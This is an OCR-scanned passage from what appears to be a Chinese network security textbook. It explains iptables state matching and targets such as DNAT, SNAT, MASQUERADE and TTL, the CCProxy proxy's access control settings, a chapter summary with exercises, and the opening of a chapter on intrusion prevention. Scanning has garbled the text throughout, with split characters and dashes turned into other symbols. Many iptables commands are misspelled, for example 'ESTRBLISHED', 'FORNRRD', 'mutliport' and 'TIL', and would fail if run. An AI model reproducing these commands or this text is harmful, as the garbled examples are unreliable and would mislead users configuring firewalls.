(4) -m mac --mac-source XX:XX:XX:XX:XX:XX: 基于 报 文 的 MAC 源 地 址 匹配 。 
iptables — A INPUT 一 m mac —— mac— Source 00:00:00:00:00:01 


iptables 支持 有 状态 的 包 过 滤 机 制 ,使 用 -m state 选项 , 它 共 有 4 种 状态 可 用 : 
INVALID.ESTABLISHED NEW 和 RELATED。INVALID 指 报 文 没有 已 知 的 流 或 连 
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接 与 之 关联 ,也 可 能 是 报 文 自身 有 问题 。ESTABLISHED 指 报 文 属于 已 建立 的 连接 。 
NEW 指 报 文 将 要 开始 建立 一 个 新 的 连接 。RELATED 说 明报 文 在 建立 一 个 新 的 连接 ， 
而 且 这 个 连接 与 一 个 已 建立 的 连接 相 有 关联 ,例如 ,FTP 数据 连接 与 先前 建立 的 控制 连 
接 有 关 ,ICMP 错误 报 文 与 先前 的 UDP 通信 相关 。 

除了 防火 墙 自身 产生 的 报 文 由 NAT 表 的 OUTPUT 链 处 理 外 ,所 有 状态 跟踪 都 在 
NAT 表 的 PREROUTING 链 里 进行 ,iptables 会 在 PREROUTING 链 里 计算 所 有 的 状 
态 。 如 果 防 火 墙 发 送 一 个 TCP 的 连接 请 求 ,连接 状态 就 会 在 OUTPUT 链 里 被 设置 为 
NEW, 当 收 到 回应 报 文 时 , 连接 状态 会 在 PREROUTING 链 里 被 设置 为 
ESTABLISHED。 如 果 第 一 个 报 文 不 是 防火 墙 自身 产生 ,那么 报 文 对 应 的 连接 就 会 在 
PREROUTING 链 里 设置 为 NEW 状态 。 所 有 状态 的 改变 和 计算 都 是 在 NAT 表 中 的 
PREROUTING 链 和 OUTPUT 链 里 完成 。 


iptables -AR INPUT -mstate -- state ESTRBLISHED  // 只 匹配 符合 ESTABLISHED 状态 的 报 文 


iptables 针对 不 同 表 的 执行 动作 有 所 不 同 , 针 对 Filter 表 主 要 是 ACCEPT REJECT、 
LOG、DROP .ULOG RETURN 和 跳 转 到 自 定 义 链 等 ,针对 NAT 表 除 了 Filter 表 的 动作 
外 ,还 包括 SNAT、DNAT、REDIRECT 和 MASQUERADE 等 ; 针对 Mangle 表 除 了 
Filter 表 的 设置 之 外 ,还 包括 设置 TOS 和 TTL 的 值 。 

(1) -j ACCEPT: 当 报 文 满足 匹配 条 件 就 会 被 ACCEPT ,不 会 再 去 匹配 当前 链 中 的 
其 他 规则 或 同一 个 表 内 的 其 他 规则 ,但 是 它 还 要 通过 其 他 表 中 的 链 的 规则 的 匹配 和 
检测 。 

(2) -j DROP: 当 报 文 满足 匹配 条 件 就 会 被 丢弃 ,不 会 再 去 匹配 任何 的 其 他 规则 。 

(3) -j REJECT: REJECT 和 DROP 基本 一 样 ,区 别 在 于 它 除了 丢弃 报 文 之 外 ,还 向 
发 送 者 返回 错误 信息 。 该 动作 只 能 用 在 INPUT、FORWARD、OUTPUT 和 它们 调用 的 
自 定义 链 中 。 

iptables — A FORWARD — p TCP -- dport 22 — j REJECT —— reject— with tcp— reset 


(4) -j LOG: 将 报 文 的 有 关 细 节 , 如 IP 头 部 信息 , 写 入 syslogd 的 日 志文 件 ,主要 用 
于 调试 规则 。 

iptables — A FORWARD — p tcp - j LOG -- 1og- level debug 

iptables — A INPUT -ptcp ~- j LOG --1og-tcp- sequence 

(5) -ji ULOG: 可 以 在 用 户 空间 记录 匹配 报 文 的 信息 ,将 这 些 信息 通过 netlink 
socket 套 接 字 多 播 , 然 后 其 他 用 户 程序 可 以 接收 这 些 信息 ,可 以 利用 MySQL 或 其 他 数据 
库 接收 这 些 信息 。 

// 指 定向 哪个 netlink 组 发 送 包 ,共有 32 个 netlink 组 ,被 简单 地 编号 为 1~32, 默认 值 是 1 

iptables — A INPUT —p TCP —— dport 22 —j ULOG —— ulog— nlgroup 2 

(6) -] DNAT --to-destination: 重 写 报 文 的 目的 IP 地 址 ,如 果 一 个 报 文 被 匹配 ,那么 
和 它 属 于 同一 个 连接 的 所 有 报 文 都 会 自动 转换 , 仅 用 于 NAT 表 的 OUTPUT 和 
PREROUTING 链 。 
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iptables —t nat — A PREROUTING -ptcp —d15.45.23.67 —— dport 80 — j DNAT 
—— to— destination 192.168.1.1 一 192.168.1.10 
iptables -tnat -RPREROUTING -ptcp -d15.45.23.67 -- dport 80 — j DNAT 
一 to- destination 192.168.1.1:80 一 100 
(7) -j SNAT - -to-source: 与 DNAT 类 似 , 只 是 用 于 NAT 表 的 INPUT 和 
POSTROUTING 链 。 
iptables —t nat — A POSTROUTING — p tcp -oeth0 —j SNAT 
—— to— source 194.236.50.155 — 194.236.50.160:1024 — 32000 
(8) -j MASQUERADE [--to-ports [portl[-port2]]]: 与 SNAT 动作 相同 ,但 是 它 
不 需要 指定 --to-source。 它 是 被 专门 设计 用 于 动态 获取 IP 地 址 的 接口 ,如 拨号 上 网 和 
DHCP 等 。 如 果 防 火 墙 的 接口 有 固定 的 静态 IP 地 址 ,使 用 SNAT 更 好 , 它 也 只 能 用 于 
NAT 表 的 POSTROUTING 链 。 














iptables —t nat — A POSTROUTING — p TCP — j MASQUERADE —— to- ports 1024— 31000 


(9) -j REDIRECT [--to-ports [portl[-port2]]]: 将 报 文 转发 到 防火 墙 自身 的 指定 
端口 。 该 动作 把 报 文 的 目标 地 址 修改 为 iptables 所 在 主机 的 IP, 目 标 端口 为 命令 中 指定 
端口 。 该 动作 非常 适合 配置 透明 代理 ,只 能 用 在 NAT 表 的 PREROUTING .OUTPUT 
链 和 被 它们 调用 的 自 定义 链 里 。 

iptables 一 七 nat 一 APREROUTING —p tcp -一 dport 80 一 jREDIRECT -- to- ports 8080 


(10) -j RETURN: 该 动作 使 得 报 文 处 理 返回 到 父 链 中 ,如 果 报 文 在 子 链 中 遇 到 
RETURN 动作 , 则 返回 父 链 的 下 一 条 规则 继续 进行 匹配 ,若是 在 父 链 (也 称 主 链 , 如 
INPUT) 中 遇 到 RETURN 动作 ,就 执行 链 的 缺 省 策略 所 规定 的 动作 ,有 些 类 似 函 数 返回 
的 概念 。 

(11) -jTTL: TTL 动作 可 以 修改 IP 头 部 中 TTL 字段 的 值 ,iptables 可 以 把 所 有 外 
出 报 文 的 TTL 值 都 设置 成 相同 值 , 它 只 能 在 Mangle 表 中 定义 。 

iptables 一 tmangle — A PREROUTING — i eth0 —j TIL --ttl- set 64 

iptables —t mangle — A PREROUTING — i eth0 —j TIL -一 ttl-dec1 

iptables —t mangle — A PREROUTING — i eth0 ~ j TIL --ttl-inc 1 

(12) -j 自 定义 链 名 : 跳 转 到 自 定义 链 进 行规 则 匹配 。 

iptables 的 功能 十 分 强大 ,配置 选项 众多 ,因此 比较 容易 出 错 ,需要 仔细 调试 才能 保 
证 规则 集合 与 安全 策略 一 致 ,下 面 给 出 一 个 简单 的 针对 Filter 表 的 示例 规则 集合 ,其 配置 
结果 如 图 7-26 所 示 。 

iptables —P INPUT DROP // 默 认 丢弃 

iptables -P OUTPUT ACCEPT ”// 默 认 接 受 

iptables - P FORNRRD DROP ”// 上 默认 丢弃 

// 接 受 访问 本 机 22, 80 号 端口 的 报 文 


iptables — A INPUT —p tcp 一 mmutliport —— destination— port 22,80 一 j ACCEPT 
iptables — A INPUT -picmp -mstate —— state ESTABLISHED - j ACCEPT // 只 接受 ICMP 响应 报 文 
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iptables — A FORWARD —f —mlimit -- limit 100/s — j ACCEPT // 限 制 IP 分 片 报 文 的 匹 
// 配 速率 每 秒 100 个 

// 对 于 非 ICMP 应 答 报 文 的 转发 速率 是 平均 每 秒 1 个 ,最 高 不 超过 每 秒 10 个 ; 

iptables — A FORWARD —p icmp —m limit —— limit 1/s -- limit— burst 10 —j ACCEPT 

// 转 发 从 外 部 到 内 部 的 状态 属于 已 有 连接 的 报 文 

iptables — A FORWARD 一 i eth0 一 m state 一 一 state RELATED, ESTABLISHED — j ACCEPT 

iptables — A FORWARD — o eth0 — j ACCEPT // 从 内 部 到 外 部 的 报 文 都 接受 





图 7-26 iptables 配置 结果 示例 


7.3.4 CCProxy 


遥 志 代理 服务 器 CCProxy, 是 国内 最 流行 的 下 载 量 最 大 的 国产 代理 服务 器 软件 , 它 
支持 常见 应 用 层 协 议 的 代理 服务 ,同时 也 支持 传输 层 代理 (Socks)。 它 实现 了 基于 IP 地 
址 .MAC 地 址 ,用 户 名 、DNS 域名 和 访问 时 间 的 控制 策略 ,十 分 灵活 ,配置 也 非常 简单 。 
CCProxy 支持 的 应 用 层 协 议 如 图 7-27 所 示 ,包括 HTTP HTTPS、FTP、TELNET 邮件 
和 DNS 协议 等 。 
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图 7-27 CCProxy 支持 的 协议 列表 





CCProxy 的 访问 控制 策略 在 “用户 管 理 ” 菜 单项 中 实现 ,如 图 7-28 所 示 , 支 持 多 种 组 
合 方式 构成 访问 控制 策略 。 用 户 可 以 通过 “网 站 过 滤 ” 选 项 预先 定义 DNS 域名 ,过 滤 用 户 
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可 访问 的 域名 列表 ,可 以 从 文本 文件 中 导入 ,也 可 以 直接 输入 由 分 号 隔 开 的 多 个 域名 , 域 
名 也 支持 通配符 。“ 网 站 过 滤 ” 功 能 还 支持 文件 名 后 级 过 滤 和 基于 关键 字 的 用 户 内 容 过 渡 
(图 7-29) ,用 户 可 以 通过 “时 间 安 排 ”选项 预先 定义 可 以 使 用 代理 的 访问 时 间 , 按 一 个 星 
期 的 周期 编排 ,可 设置 每 天 不 同时 段 代 理 不 同 协议 。 访 问 控制 策略 基于 用 户 名 称 和 口令 
的 身份 认证 ,结合 IP 地 址 .上 下 行 带宽 限制 .并 发 连接 数 限制 .DNS 域名 和 时 间 安 排 , 设 
置 内 部 网 络 用 户 的 访问 策略 ,其 中 IP 地 址 用 于 限制 内 部 网 络 可 以 使 用 代理 的 具体 主机 或 






















































































7-29 ”CCProxy 的 访问 控制 策略 示例 


7-29 给 出 一 个 简单 的 访问 控制 策略 示例 , 它 允 许 用 户 以 账号 fguo 通过 主机 
192. 168. 2. 200 使 用 代理 ,不 限制 该 用 户 的 并 发 连接 和 上 下 行 带宽 ,禁止 通过 代理 访问 
以 “jxnu. edu. cn” 为 后 级 的 域名 ,周一 至 周 五 只 能 在 中 午 12 点 至 下 午 2 点 的 午休 时 间 
访问 ,周末 无 限制 。 该 策略 同时 支持 所 有 应 用 层 协议 和 电路 层 代 理 , 策 略 到 期 时 间 为 
2017. 07.07。 
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7.4 小 结 


访问 控制 技术 用 于 授权 、 限 制 和 监控 用 户 对 网 络 资源 的 授权 访问 ,保证 资源 的 合法 使 
用 ,包括 主体 、 客 体 \ 访 问 和 安全 策略 等 元 素 。 常 见 模型 包括 自主 访问 控制 (DAC) ,强制 
访问 控制 (MAC) 和 基于 角色 的 访问 控制 (RBAC)。DAC 较为 灵活 ,但 是 安全 性 较 差 ; 
MAC 安全 性 较 好 ,但 是 不 够 灵活 ,因此 通常 将 两 者 结合 使 用 。RBAC 通过 角色 的 概念 实 
现 主 体 与 访问 权限 的 逻辑 分 离 , 十 分 灵活 ,容易 实现 最 小 权限 原则 。 

模型 的 实现 方法 包括 访问 控制 矩阵 .访问 能 力 表 (ACCL) ,访问 控制 列表 (ACL) 和 授 
权 关 系 表 等 ,ACCL 可 以 看 成 是 访问 控制 矩阵 按 行 信息 生成 ,ACL 可 以 看 成 是 访问 控制 
和 矩阵 按 列 信息 生成 ,授权 关系 表 综 合 了 ACCL 和 ACL 的 优点 。 

防火 墙 工 作 在 不 同 网 络 之 间 的 唯一 出 入 口 ,是 网 络 安全 的 第 一 道 闸门 , 它 仅 允 许 符合 
安全 策略 的 报 文通 过 ,只 能 检测 流 经 防火 墙 的 报 文 ,并 且 防 火 墙 自身 必须 能 够 抵御 网 络 攻 
击 。 防 火 墙 的 功能 包括 服务 控制 .方向 控制 ,用户 控制 .行为 控制 和 监控 审计 等 。 

防火 墙 按 报 文 分 析 的 协议 层次 划分 ,包括 包 过 滤 防 火 墙 . 电 路 层 网 关 和 应 用 层 网 关 。 
无 状态 包 过 滤 防 火 墙 单独 分 析 每 个 报 文 ,而 有 状态 包 过 滤 防 火 墙 可 以 将 不 同 报 文 归 类 为 
一 个 会 话 , 从 传输 层 和 应 用 层 角 度 对 多 个 报 文 进行 关联 分 析 。 代 理 防火 墙 阻 断 内 部 网 络 
与 外 部 网 络 的 直接 联系 ,将 内 部 网 络 与 外 部 网 络 的 每 条 通信 连接 分 割 为 两 条 连接 ,一 条 内 
部 网 络 与 代理 的 通信 连接 ,另外 一 条 是 代理 与 外 部 网 络 的 通信 连接 ,从 而 可 以 很 好 地 监控 
内 部 与 外 部 通信 。 电 路 层 代理 工作 在 传输 层 ,可 以 用 于 不 同 应 用 层 协 议 ; 而 一 个 应 用 层 
代理 只 适用 于 一 种 应 用 层 协 议 。 

防火 墙 的 部 署 方 式 按 安全 性 由 低 到 高 可 分 为 单一 包 过 滤 防 火 墙 结构 . 单 穴 堡垒 主机 
结构 、 双 穴 堡垒 主机 结构 和 屏蔽 子 网 结构 。 

防火 墙 无 法 解决 所 有 的 安全 问题 , 它 无 法 防御 不 经 过 防火 墙 的 攻击 ,也 无 法 阻止 来 自 
内 网 的 攻击 。 

Windows 自 带 的 个 人 防火 墙 实 现 将 包 过 滤 防 火 墙 和 基于 进程 的 访问 控制 相 结 合 ， 
Cisco 路 由 器 的 ACL 规则 是 标准 的 无 状态 包 过 滤 防 火 墙 ,但 是 其 ESTABLISHED 选项 
可 用 于 过 滤 TCP 连接 请 求 报 文 。Linux 的 iptables 软件 功能 强大 ,配置 复杂 ,集成 了 包 过 
滤 防 火 墙 NAT 和 报 文 修改 功能 ,可 深入 分 析 传输 层 协议 ,部 分 支持 有 状态 的 报 文 过 滤 ， 
支持 日 志 记录 ,支持 性 能 配置 等 。 

CCProxy 是 国内 广泛 应 用 的 代理 服务 程序 ,支持 电路 层 代理 和 应 用 层 代理 ,以 图 形 
化 界面 设置 访问 控制 策略 ,简单 易 用 ,较为 灵活 。 


习 题 


7-1 Linux 的 EXT 文件 系统 的 文件 访问 控制 方式 属于 哪 一 类 ? Windows 的 
NTFS 呢 ? 
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7-2 简 述 防火 墙 的 基本 功能 ,说 明 为 什么 防火 墙 无 法 防御 内 部 攻击 。 

7-3 请 画 出 防火 墙 的 常用 部 署 结 构 , 并 比较 其 优 缺点 。 请 在 图 7-11 的 Cisco 路 由 器 
的 1 号 接口 上 写 出 ACL 规则 ,使 得 所 有 内 外 网 通信 都 必须 经 过 堡 公主 机。 

7-4 在 下 列 拓扑 中 ,如 何 使 用 CISCO 的 ACL 语法 实现 下 述 安全 策略 ? 

(1) 不 允许 LAN1 中 的 终端 访问 LAN2 中 的 TELNET 服务 ; 

(2) 只 允许 LAN2 中 的 终端 (其 他 主机 禁止 ) 访 问 LAN1 中 的 Web 服务 ; 

(3) 其 他 网 络 通信 必须 畅通 无 阻 。 





Web 服 务 器 193.1.2.5 
LAN1 RI R2 LAN2 
193.1.1.0/29) 193.1.2.0/2 
193.1.13 
193.1.1.1 
终端 A 





7-5 假设 在 图 7-24 上 运行 着 iptables, E0 接口 地 址 为 172. 16. 3. 1, El 地 址 为 
172. 16. 4. 1,S0 接口 为 172. 16. 1. 1, 如 何 配置 iptables 满足 下 列 安全 策略 ? 

(1) 允许 所 有 其 他 网 络 访问 172. 16. 3. 0 网 络 的 SSH Web 和 邮件 服务 ; 

(2) 不 允许 其 他 主机 Ping 通 172. 16. 3. 0 网 络 的 主机 

(3) 只 允许 172. 16. 3. 0 主机 访问 外 部 网 络 的 Web 服务 ; 

(4) 网 络 172. 16. 4. 0 的 主机 与 外 网 通信 时 ,被 NAT 转换 为 相应 防火 墙 的 接口 IP 
地 址 。 

7-6 定义 一 条 Windows 个 人 防火 墙 的 自 定义 入 站 规则 ,限制 外 部 程序 访问 Netcat 
程序 开启 的 2000 端口 ,然后 利用 Netcat 程序 开启 2000 和 2001 端口 ,从 另外 一 台 主 机 分 
别 访 问 2000 和 2001 端口 ,请 解释 能 否 成 功 访问 ,为 什么 ”如 果 使 用 Netcat 访问 主机 的 
其 他 开放 端口 ,能 否 成 功 ? 请 实验 验证 你 的 解释 。 

7-7 简 述 代理 防火 墙 和 有 状态 包 过 滤 防 火 墙 的 区 别 。 

7-8 简 述 包 过 滤 防 火 墙 的 一 般 工 作 流程 。 


女生 8 音 


入 侵 防 御 


学 习 要 求 : 

。 了 解 IPS 工作 过 程 和 分 类 方法 。 

。 掌握 各 种 IPS 数据 分 析 技 术 的 基本 原理 。 

。 理解 IPS 的 部 署 方式 和 评估 方法 。 

。 掌握 HIPS 基本 原理 和 工作 流程 ,掌握 HIPS 软件 OSSEC 的 使 用 方法 。 

。 掌握 NIPS 基本 原理 和 工作 流程 ,熟练 掌握 NIPS 软件 Snort 的 使 用 方法 。 


入 侵 泛 指 未 经 授权 访问 网 络 资源 的 行为 。 入 侵 防御 系统 (Intrusion Prevention 
System,IPS) 用 于 实时 监视 、 检 测 和 分 析 网 络 资源 访问 行为 ,在 入 侵 发 生 时 及 时 制止 入 
侵 , 起 到 保护 目标 网 络 和 主机 的 作用 。 它 分 为 两 部 分 ,一 是 入 侵 检 测 (Intrusion Detection 
System,IDS) ,二 是 终止 入 侵 (Counter Attack)。 和 信 侵 检测 通常 对 计算 机 网 络 或 主机 中 的 
若干 关键 点 进行 收集 和 分 析 ,检测 资源 访问 行为 是 否 可 能 违反 安全 策略 。 终 止 人 侵 
主要 通过 关闭 连接 、 阻 断 IP 地 址 .关闭 进程 .修改 防 火 墙 规则 和 反 向 追踪 攻击 者 等 方式 
进行 。 

IPS 是 一 种 主动 的 网 络 安全 技术 ,作为 防火 墙 的 合理 补充 ,用 于 对 付 网 络 攻击 ,通常 
被 认为 是 防火 墙 之 后 的 第 二 道 安 全 闸门 ,力图 在 不 影响 目标 性 能 的 情况 下 对 受 保护 的 网 
络 和 主机 进行 检测 。 

按照 监视 的 资源 进行 划分 ,IPS 可 分 为 基于 主机 、 基 于 网 络 或 混合 型 IPS。 按 照 IPS 
的 分 析 技 术 划 分 ,可 分 为 误 用 检测 和 异常 检测 。 按 照 部 署 方 式 划 分 ,可 分 为 集中 式 、 分 布 
式 和 分 层 式 。 按 照 系 统 工作 方式 划分 ,可 分 为 离线 分 析 和 在 线 分 析 。 按 照 响应 方式 划分 ， 
可 分 为 被 动 响应 和 主动 响应 。 









8. 1 IPS 概述 


IETF 提出 了 一 个 通用 入 侵 检测 模型 CIDF, 阐 述 了 标准 IPS 的 通用 工作 模型 (图 1-6)， 
它 将 IPS 收集 的 信息 统称 为 事件 (event) ,事件 可 以 是 网 络 报 文 . 系 统 日 志 、 应 用 程序 日 
志 , 也 可 以 是 程序 或 命令 的 执行 结果 等 不 同 的 信息 。 它 将 一 个 IPS 系统 抽象 划分 为 以 下 
组 件 : 

(1) 事件 生成 器 (Event Generators) : 从 整个 网 络 系统 中 获得 事件 ,把 这 些 事件 格式 
转化 为 统一 的 信息 格式 (Global Intrusion Detection Object,GIDO) 后 ,传送 给 其 他 组 件 。 
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(2) 事件 分 析 器 (Event Analyzers): 从 其 他 组 件 获得 GIDO, 经 过 分 析 后 ,生成 新 的 
GIDO 传送 给 其 他 组 件 。 它 是 CIDF 的 核心 组 件 ,可 以 是 一 个 特征 检测 工具 一 个 不 同事 
件 的 关联 工具 ,也 可 以 是 一 个 统计 分 析 工 具 等 功能 各 异 的 工具 。 

(3) 响应 单元 (Response Units): 对 事件 分 析 器 的 分 析 结 果 做 出 反应 的 响应 单元 ， 
IDS 仅仅 是 产生 报警 , 传 给 不 同 的 输出 组 件 ; IPS 可 以 终止 进程 .复位 连接 和 修改 文件 属 
性 等 。 

(4) 事件 数据 库 (Event Databases) : 存放 各 种 数据 的 存储 系统 ,可 以 是 复杂 数据 库 ， 
也 可 以 是 文本 文件 。 

IPS 的 功能 主要 包括 以 下 几 个 方面 : 

(1) 监视 系统 运行 。 根 据 预 定义 的 模型 或 特征 实时 监控 系统 关键 行为 ,识别 探测 攻 
击 `.DoS、 缓 冲 区 溢出 等 常见 网 络 攻击 手法 ,识别 用 户 非 法 访问 ,识别 合法 用 户 的 越权 
操作 。 

(2) 监视 系统 配置 。 检 测 系 统 配 置 的 正确 性 ,保证 系统 配置 的 完整 性 ,根据 预定 义 的 
规则 或 策略 ,识别 攻击 者 对 系统 配置 的 非法 修改 。 

(3) 监视 网 络 通信 。 对 网 络 中 的 异常 流量 或 用 户 的 异常 访问 进行 统计 分 析 或 特征 检 
测 ,识别 不 符合 预定 义 模型 或 者 与 预定 义 特征 相 匹 配 的 网 络 报 文 ,识别 可 疑 的 入 侵 行 为 。 

(4) 入 侵 阻止 。 在 识别 攻击 行为 后 ,采取 各 种 手段 终止 网 络 攻击 ,保护 目标 系统 。 


8.1.1 工作 过 程 


IPS 的 工作 过 程 主要 分 为 三 部 分 , 即 信 息 收集 、 数 据 分 析 和 结果 响应 。 

1. 信息 收集 

IPS 的 第 一 步 是 信息 收集 ,通常 在 目标 网 络 的 关键 位 置 部 署 信息 收集 工具 即 事件 生 
成 器 (也 可 称 为 sensor 或 agent) ,可 以 是 关键 的 服务 器 或 重要 的 主机 ,也 可 以 是 安全 需求 
较 高 的 网 段 。 信 息 来 源 主要 包括 : 

(1) 系统 和 应 用 程序 日 志 。 入 侵 行为 发 生 时 ,日 志 或 多 或 少 会 记录 攻击 者 留 下 的 痕 
迹 ,IPS 通过 分 析 日 志 就 可 能 发 现 人 侵 企 图 。 例 如 ,在 Windows 系统 登录 的 审核 日 志 中 ， 
如 果 出 现 多 条 同一 用 户 短 时 间 内 登录 失败 的 事件 ,那么 很 可 能 是 攻击 者 在 进行 弱 口 令 
攻击 。 

(2) 目录 和 文件 的 修改 。 攻 击 者 在 设置 后 门 时 经 常会 蔡 换 系统 文件 ,入 侵 成 功 后 也 
会 上 传 工具 展开 进一步 攻击 ,这 些 行为 会 创建 或 修改 某 些 文件 和 目录 ,监视 这 些 目录 和 文 
件 的 完整 性 是 否 被 破坏 ,可 以 及 时 发 现 人 侵 行为 。 

(3) 程序 行为 的 异常 改变 。 根 据 程 序 的 运行 方式 对 程序 的 运行 行为 建 模 , 当 入 侵 行 
为 发 生 时 ,该 程序 运行 方式 可 能 被 修改 或 破坏 (如 缓冲 区 溢出 攻击 ) ,只 要 创建 合适 的 安全 
策略 , 即 可 识别 这 种 异常 行为 。 

(4) 网 络 通信 的 异常 报 文 。 网 络 攻击 属于 远程 非 授权 访问 ,攻击 者 必须 与 远程 目标 
进行 网 络 通信 ,根据 预定 义 规则 或 模型 监视 网 络 通信 报 文 ,可 以 实时 识别 潜在 的 入 侵 
行为 。 

(5) 物理 形式 的 异常 访问 。 主 要 是 硬件 资源 的 访问 日 志 , 如 非 工 作 时 间 进 入 主机 房 、 
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通过 控制 台 键盘 访问 服务 器 等 信息 。 

IPS 在 很 大 程度 上 依赖 于 信息 收集 的 可 靠 性 和 正确 性 ,因此 IPS 在 接收 信息 收集 工 
具 传 递 的 事件 前 ,必须 验证 这 些 工具 是 否 可 信 , 防 止 事件 被 算 改 而 收集 到 错误 信息 。 

2. 数据 分 析 

数据 分 析 是 IPS 的 核心 工作 ,通常 有 三 种 方式 : 

(1) 特征 检测 (又 称 误 用 检测 )。 将 收集 的 信息 与 已 知 的 入 侵 特 征 数据 库 进行 匹配 ， 
发 现 可 能 的 入侵 。 

(2) 异常 检测 。 预 先 对 系统 对 象 (用 户 、 文 件 、 报 文 等 ) 的 正常 行为 创建 模型 ,记录 正 
常 行为 的 可 测量 属性 (如 访问 次 数 ) ,实时 比较 当前 行为 的 属性 值 与 预定 义 模型 的 属性 值 ， 
当 差 值 超过 某 个 阅 值 时 ,就 判定 有 入 侵 发 生 。 

(3) 完整 性 分 析 。 检 测 文件 或 目录 的 各 种 属性 是 否 发 生变 化 ,该 分 析 属 于 事后 分 析 ， 
通常 预先 应 用 哈 希 摘要 算法 得 出 各 个 对 象 的 预定 义 哈 希 值 , 然 后 定期 重新 计算 各 个 对 象 
的 哈 希 值 ,并 与 预先 生成 的 哈 希 值 比较 ,一 旦 发 生变 化 , 即 表示 有 非法 修改 发 生 。 

3. 结果 响应 

根据 分 析 结 果 识 别 可 能 发 生 入 侵 后 ,IDS 把 分 析 结 果 记 录 在 日 志 中 并 产生 报警 ,将 报 
警 发 送 至 IDS 控制 台 实 时 显示 并 立即 用 各 种 方式 通知 系统 管理 员 ; 而 IPS 进一步 可 以 根 
据 报警 与 防火 墙 和 路 由 器 联动 .终止 进程 运行 、 重 置 连接 、 改 变 文件 属性 等 。 


8.1.2 分 析 方法 


IPS 是 一 个 复杂 的 数据 处 理 和 分 析 系 统 , 关 键 问 题 是 如 何 从 大 量 的 事件 中 有 效 识别 
入侵 行为 ,因此 IPS 的 研究 集中 于 数据 挖掘 和 模式 识别 技术 上 ,包括 特征 选择 .知识 表示 
与 获取 、 机 器 学 习 \ 数 据 挖掘 和 各 种 分 类 算法 等 。 

1. 特征 检测 

特征 检测 (Signature-based Detection) ,又 称 误 用 检测 (Misuse Detection) ,是 目前 最 
为 成 熟 ,在 开源 和 商业 IPS 中 应 用 最 为 广泛 的 分 析 技 术 。 它 从 各 种 已 知 的 入 侵 行为 中 提 
取出 精确 的 攻击 特征 表示 ,构成 攻击 特征 数据 库 ,然后 对 收集 的 事件 进行 特征 匹配 ,所 有 
符合 特征 的 事件 均 被 认为 是 入 侵 。 显 然 ,特征 检测 只 能 识别 已 知人 侵 , 无 法 识别 未 知 或 者 
未 公开 的 入侵 行为 。 特 征 检测 的 难点 主要 在 于 如 何 精确 地 从 入 侵 行为 中 提取 攻击 特征 ， 
把 入 侵 行为 与 正常 行为 有 效 区 分 。 特 征 检 测 的 优点 是 误 报 较 少 。 

特征 检测 方法 主要 包括 : 

(1) 模式 匹配 。 是 最 基本 的 检测 方法 ,可 以 匹配 特定 字符 串 ,也 可 以 使 用 正则 表达 式 
进行 匹配 。 该 方法 原理 简单 ,扩展 性 高 ,检测 准确 率 和 效率 较 高 ,Snort IDS 就 是 采用 模式 
匹配 方法 。 

(2) 状态 迁移 。 一 次 完整 的 攻击 过 程 往往 由 多 个 不 同 阶段 组 成 ,这 些 阶 段 使 得 系统 
从 正常 状态 逐步 转移 到 被 人 侵 的 状态 ,两 个 状态 之 间 可 能 有 多 个 中 间 状 态 。 可 以 使 用 状 
态 转换 图 构建 攻击 场景 ,描述 已 知 的 和 人 侵 模式 ,利用 该 方法 可 以 检测 出 复杂 的 攻击 方式 。 
当 攻击 场景 十 分 复杂 时 ,构建 场景 比较 困难 ; 另外 ,状态 迁移 法 必须 与 其 他 方法 配合 ,以 
识别 中 间 状 态 。 例 如 ,攻击 场景 中 的 每 个 状态 都 可 以 是 模式 匹配 的 结果 ,每 次 模式 匹配 成 
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功 后 ,相应 攻击 场景 迁移 至 下 一 状态 。 

(3) 专家 系统 。 早 期 的 IPS 大 多 采用 专家 系统 进行 判定 ,该 方法 采用 类 似 * 计 条 件 
then 动作 ”的 结构 按 指定 格式 表示 入 侵 模式 ,并 构建 知识 库 。 其 中 “if” 部 分 描述 攻击 所 必 
需 的 规则 和 条 件 , 当 “if” 部 分 的 条 件 被 满足 时 ,“then” 部 分 规定 的 动作 被 执行 。 专 家 系统 
依赖 于 知识 库 的 完备 性 ,同样 也 只 能 检测 已 知 入 侵 模 式 。 

2. 异常 检测 

异常 检测 (Anomaly Detection) 也 称 为 基于 行为 的 检测 ,基于 以 下 思想 : 人 类 的 正常 
行为 都 具备 一 定 规律 ,并 且 可 以 通过 行为 分 析 生 成 这 种 规律 。 而 入 侵 行为 与 正常 行为 存 
在 很 大 差异 ,因此 检测 出 这 些 差 异 即 可 检测 入 侵 。 显 然 ,异常 检测 的 关键 在 于 如 何 建立 正 
常 的 行为 模式 ,设置 有 效 的 差异 闵 值 ,从 而 有 效 区 分 入侵 行为 和 正常 行为 ,不 会 把 它们 混 
淆 。 如 图 8-1 所 示 , 所 有 的 行为 可 以 分 为 四 种 , 即 * 正 常 ”入 侵 行为 .异常 非 人 侵 行 为 .正常 
行为 .异常 入侵 行为 。 


异常 行为 





所 有 行为 
图 8-1 异常 行为 与 人 侵 活动 


常用 的 异常 检测 方法 有 统计 分 析 、 免 疫 技术 和 数据 挖掘 等 。 

(1) 统计 分 析 : 基于 统计 学 方法 学 习 和 检测 用 户 的 历史 行为 ,并 周期 性 地 更 新 模型 
以 反映 用 户 的 长 期 统计 特征 ,其 中 特征 变量 可 以 由 频 度 ,均值 和 方差 等 统计 量 进行 描述 。 
常用 的 统计 分 析 模型 有 : 

名 操作 模型 : 将 实时 测量 结果 与 固定 指标 进行 比较 ,固定 指标 可 以 根据 经 验 或 经 六 
一 段 时 间 的 统计 平均 得 到 ,例如 3min 内 5 次 登录 失败 等 。 

@ 方差 : 计算 参数 的 方差 ,并 设 定 其 置信 区 间 , 当 实时 测量 的 值 超出 置信 区 间 则 有 
可 能 是 异常 。 

@ 时 序 分 析 : 如 果 某 个 事件 在 指定 时 间 范 围 内 发 生 的 概率 较 低 , 则 可 能 是 入 侵 。 

统计 分 析 方法 存在 的 问题 在 于 : 阅 值 很 难 选 取 ; 统计 的 特征 值 无 法 体现 不 同事 件 之 
间 的 顺序 ; 难以 保证 统计 建 模 的 数据 没有 包含 人 侵 行为 , 即 统计 模型 自身 可 能 是 错误 的 。 

(2) 免疫 技术 : 免疫 技术 基于 生物 免疫 机 制 。 生 物 免疫 通过 识别 异常 或 者 以 前 从 未 
出 现 的 特征 来 确定 异体 ,计算 机 免疫 通过 正常 行为 样本 的 学 习 来 识别 不 符合 常态 概念 的 
行为 序列 。 正 常情 况 下 , 某 个 程序 的 运行 情况 是 稳定 不 变 的 ,例如 程序 执行 过 程 中 调用 的 
系统 API 序列 相对 很 稳定 ,但 是 攻击 者 在 进行 远程 攻击 时 ,会 使 得 有 漏洞 的 程序 调用 有 
